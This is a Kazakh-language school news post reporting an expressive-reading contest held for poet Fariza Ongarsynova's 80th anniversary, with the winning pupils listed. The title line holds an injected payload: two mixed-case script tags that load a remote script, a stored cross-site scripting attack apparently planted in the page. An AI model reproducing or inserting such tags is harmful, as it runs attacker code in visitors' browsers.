«Мәнерлеп оқу» сайыс<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
26.09.2019
Ғ.Әбдірахманұлы атындағы Қима орта мектебінде Фариза Оңғарсынованың туғанына 80 жыл толуына орай қыркүйек айының он тоғызы күні «Мәнерлеп оқу» сайысы өтті. Жауапты мұғалім мектебіміздің жоғарғы санатты қазақ тілі әдебиеті пәні мұғалімі Садвакасова Г.С. Сайыстың шымылдығын Фариза Оңғарсынова туралы видео көрсету арқылы бастап, 11 сынып оқушылары Фариза ақынның поэмасынан үзінділер оқыды. Сайысқа алты және жетінші сынып оқушылары қатысып, өз бақтарын сынап көрді. Нәтижесінде 7 сынып оқушысы Асылкулова М, І орынды иеленді. ІІ орынды 6 а сынып оқушысы Бекболат Н және 7 сынып оқушысы Қуанышбаева Н иеленді. Ал ІІІ орынды 6ә сынып оқушылары Искакова Д және Қайду З, 7 сынып оқушысы Оспанов А иеленді. 6а сынып оқушылары Жолдыбаева Д, Көпжасар А номинацияға ие болды.
Жеңістеріңіз құтты болсын балалар!
Самурат Н.